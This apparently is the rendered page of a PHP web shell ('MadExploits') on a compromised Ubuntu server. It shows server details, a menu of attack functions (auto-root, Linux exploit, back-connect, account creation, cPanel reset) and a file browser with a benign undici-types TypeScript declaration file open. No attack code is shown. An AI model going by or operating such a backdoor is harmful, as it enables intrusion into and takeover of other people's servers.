Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
undici-types /
[ HOME SHELL ]
Name
Size
Permission
Action
README.md
455
B
-rw-rw-r--
agent.d.ts
1.04
KB
-rw-rw-r--
api.d.ts
1.42
KB
-rw-rw-r--
balanced-pool.d.ts
609
B
-rw-rw-r--
cache.d.ts
1.22
KB
-rw-rw-r--
client.d.ts
4.52
KB
-rw-rw-r--
connector.d.ts
1
KB
-rw-rw-r--
content-type.d.ts
561
B
-rw-rw-r--
cookies.d.ts
635
B
-rw-rw-r--
diagnostics-channel.d.ts
1.6
KB
-rw-rw-r--
dispatcher.d.ts
13.1
KB
-rw-rw-r--
errors.d.ts
3.64
KB
-rw-rw-r--
fetch.d.ts
5.33
KB
-rw-rw-r--
file.d.ts
1.67
KB
-rw-rw-r--
filereader.d.ts
1.42
KB
-rw-rw-r--
formdata.d.ts
4.89
KB
-rw-rw-r--
global-dispatcher.d.ts
276
B
-rw-rw-r--
global-origin.d.ts
175
B
-rw-rw-r--
handlers.d.ts
387
B
-rw-rw-r--
header.d.ts
133
B
-rw-rw-r--
index.d.ts
2.9
KB
-rw-rw-r--
interceptors.d.ts
215
B
-rw-rw-r--
mock-agent.d.ts
2.48
KB
-rw-rw-r--
mock-client.d.ts
1002
B
-rw-rw-r--
mock-errors.d.ts
338
B
-rw-rw-r--
mock-interceptor.d.ts
3.8
KB
-rw-rw-r--
mock-pool.d.ts
974
B
-rw-rw-r--
package.json
1.17
KB
-rw-rw-r--
patch.d.ts
1.64
KB
-rw-rw-r--
pool-stats.d.ts
669
B
-rw-rw-r--
pool.d.ts
1008
B
-rw-rw-r--
proxy-agent.d.ts
836
B
-rw-rw-r--
readable.d.ts
1.58
KB
-rw-rw-r--
webidl.d.ts
5.5
KB
-rw-rw-r--
websocket.d.ts
3.35
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : webidl.d.ts
// These types are not exported, and are only used internally /** * Take in an unknown value and return one that is of type T */ type Converter<T> = (object: unknown) => T type SequenceConverter<T> = (object: unknown) => T[] type RecordConverter<K extends string, V> = (object: unknown) => Record<K, V> interface ConvertToIntOpts { clamp?: boolean enforceRange?: boolean } interface WebidlErrors { exception (opts: { header: string, message: string }): TypeError /** * @description Throw an error when conversion from one type to another has failed */ conversionFailed (opts: { prefix: string argument: string types: string[] }): TypeError /** * @description Throw an error when an invalid argument is provided */ invalidArgument (opts: { prefix: string value: string type: string }): TypeError } interface WebidlUtil { /** * @see https://tc39.es/ecma262/#sec-ecmascript-data-types-and-values */ Type (object: unknown): | 'Undefined' | 'Boolean' | 'String' | 'Symbol' | 'Number' | 'BigInt' | 'Null' | 'Object' /** * @see https://webidl.spec.whatwg.org/#abstract-opdef-converttoint */ ConvertToInt ( V: unknown, bitLength: number, signedness: 'signed' | 'unsigned', opts?: ConvertToIntOpts ): number /** * @see https://webidl.spec.whatwg.org/#abstract-opdef-converttoint */ IntegerPart (N: number): number } interface WebidlConverters { /** * @see https://webidl.spec.whatwg.org/#es-DOMString */ DOMString (V: unknown, opts?: { legacyNullToEmptyString: boolean }): string /** * @see https://webidl.spec.whatwg.org/#es-ByteString */ ByteString (V: unknown): string /** * @see https://webidl.spec.whatwg.org/#es-USVString */ USVString (V: unknown): string /** * @see https://webidl.spec.whatwg.org/#es-boolean */ boolean (V: unknown): boolean /** * @see https://webidl.spec.whatwg.org/#es-any */ any <Value>(V: Value): Value /** * @see https://webidl.spec.whatwg.org/#es-long-long */ ['long long'] (V: unknown): number /** * @see https://webidl.spec.whatwg.org/#es-unsigned-long-long */ ['unsigned long long'] (V: unknown): number /** * @see https://webidl.spec.whatwg.org/#es-unsigned-long */ ['unsigned long'] (V: unknown): number /** * @see https://webidl.spec.whatwg.org/#es-unsigned-short */ ['unsigned short'] (V: unknown, opts?: ConvertToIntOpts): number /** * @see https://webidl.spec.whatwg.org/#idl-ArrayBuffer */ ArrayBuffer (V: unknown): ArrayBufferLike ArrayBuffer (V: unknown, opts: { allowShared: false }): ArrayBuffer /** * @see https://webidl.spec.whatwg.org/#es-buffer-source-types */ TypedArray ( V: unknown, TypedArray: NodeJS.TypedArray | ArrayBufferLike ): NodeJS.TypedArray | ArrayBufferLike TypedArray ( V: unknown, TypedArray: NodeJS.TypedArray | ArrayBufferLike, opts?: { allowShared: false } ): NodeJS.TypedArray | ArrayBuffer /** * @see https://webidl.spec.whatwg.org/#es-buffer-source-types */ DataView (V: unknown, opts?: { allowShared: boolean }): DataView /** * @see https://webidl.spec.whatwg.org/#BufferSource */ BufferSource ( V: unknown, opts?: { allowShared: boolean } ): NodeJS.TypedArray | ArrayBufferLike | DataView ['sequence<ByteString>']: SequenceConverter<string> ['sequence<sequence<ByteString>>']: SequenceConverter<string[]> ['record<ByteString, ByteString>']: RecordConverter<string, string> [Key: string]: (...args: any[]) => unknown } export interface Webidl { errors: WebidlErrors util: WebidlUtil converters: WebidlConverters /** * @description Performs a brand-check on {@param V} to ensure it is a * {@param cls} object. */ brandCheck <Interface>(V: unknown, cls: Interface, opts?: { strict?: boolean }): asserts V is Interface /** * @see https://webidl.spec.whatwg.org/#es-sequence * @description Convert a value, V, to a WebIDL sequence type. */ sequenceConverter <Type>(C: Converter<Type>): SequenceConverter<Type> illegalConstructor (): never /** * @see https://webidl.spec.whatwg.org/#es-to-record * @description Convert a value, V, to a WebIDL record type. */ recordConverter <K extends string, V>( keyConverter: Converter<K>, valueConverter: Converter<V> ): RecordConverter<K, V> /** * Similar to {@link Webidl.brandCheck} but allows skipping the check if third party * interfaces are allowed. */ interfaceConverter <Interface>(cls: Interface): ( V: unknown, opts?: { strict: boolean } ) => asserts V is typeof cls // TODO(@KhafraDev): a type could likely be implemented that can infer the return type // from the converters given? /** * Converts a value, V, to a WebIDL dictionary types. Allows limiting which keys are * allowed, values allowed, optional and required keys. Auto converts the value to * a type given a converter. */ dictionaryConverter (converters: { key: string, defaultValue?: unknown, required?: boolean, converter: (...args: unknown[]) => unknown, allowedValues?: unknown[] }[]): (V: unknown) => Record<string, unknown> /** * @see https://webidl.spec.whatwg.org/#idl-nullable-type * @description allows a type, V, to be null */ nullableConverter <T>( converter: Converter<T> ): (V: unknown) => ReturnType<typeof converter> | null argumentLengthCheck (args: { length: number }, min: number, context: { header: string message?: string }): void }
Close